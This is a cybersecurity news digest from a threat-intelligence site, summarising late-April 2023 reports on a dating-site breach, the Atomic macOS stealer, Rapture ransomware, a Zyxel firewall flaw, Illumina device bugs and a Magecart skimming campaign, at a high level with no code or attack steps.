Cyware Daily Threat Intelligence

Daily Threat Briefing • Apr 28, 2023
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Apr 28, 2023
The abuse of Telegram has become a norm in the world of cybercrime. Of late, security researchers uncovered an unidentified group selling a macOS malware called Atomic aka AMOS. Worse yet, it enables buyers to penetrate deeper into the target system while abusing over 50 cryptocurrency extensions. Shopping online isn’t as smooth as it may sound every time. Malwarebytes Labs tools the wraps off of an ongoing Magecart campaign that deploys a skimmer known as Kritec to ultimately steal credit card information while the user shops on the compromised portal.
The U.S. government issued an alert to healthcare providers and laboratory staff about several critical bugs in Illumina medical devices that could potentially expose devices to remote hacking. Illumina's products are widely used in the healthcare industry globally for DNA sequencing.
For detailed Cyber Threat Intel, click ‘Read More.’
Two dating websites suffer breach
Troy Hunt, the founder of Have I Been Pwned, disclosed that cybercriminals hijacked two dating websites, namely CityJerks and TruckerSucker, to steal a variety of users’ personal details. The leak contained email addresses, passwords, direct messages, and other data. The passwords were reportedly encrypted using a weak algorithm, which could potentially be deciphered by hackers. Criminals claim to have obtained data of around 8,000 and 77,000 users, respectively, from the two sites.
New macOS threat against crypto users
Private Telegram channels are being abused by cybercriminals to sell a new macOS malware variant that can infect over 50 cryptocurrency extensions to steal data. Dubbed Atomic, the malware author provides its buyers a ready-to-use web panel for easy victim management, a cryptocurrency checker, a MetaMask brute-forcer, a dmg installer, and the ability to receive stolen logs on Telegram.
New ransomware family with essence of Paradise
Researchers at Trend Micro noticed a ransomware variant called Rapture that adopts a minimalistic approach and leaves behind only a small digital footprint. The attackers utilized the commercial packer Themida to pack the ransomware, hence making the analysis challenging. An RSA key configuration file used by the attackers was found to be similar to that used by the Paradise ransomware.
Zyxel patches RCE flaw
Networking equipment maker Zyxel fixed a high-severity vulnerability tracked as CVE-2023-28771 in its firewall devices. TRAPA Security, which reported the flaw, explained that improper error message handling in some firewall versions could allow a remote attacker to execute arbitrary OS commands on affected systems. The issue was rated 9.8 on the CVSS scale.
Federal agencies warn of Illumina bug
The CISA and the FDA have released public notifications to inform organizations that the Universal Copy Service (UCS) component present in several of Illumina's genetic sequencing instruments is vulnerable to security threats. Although no attacks have been reported as yet, the FDA stated hackers could potentially exploit these vulnerabilities to take over a device or manipulate its configurations, settings, software, or data, including those present on the user's network.
Skimming campaign uses fake ‘modal’
A Magecart attacker compromised the website of a Parisian travel accessory store hosted on the PrestaShop CMS. Security experts analyzing the event detected Kritec skimmer being injected that would load malicious scripts to hijack the checkout process. On the checkout page, attackers used a fake ‘modal’ - a web page element displayed in front of the authentic, active page, to trick users into giving up their credentials and stealing credit card data.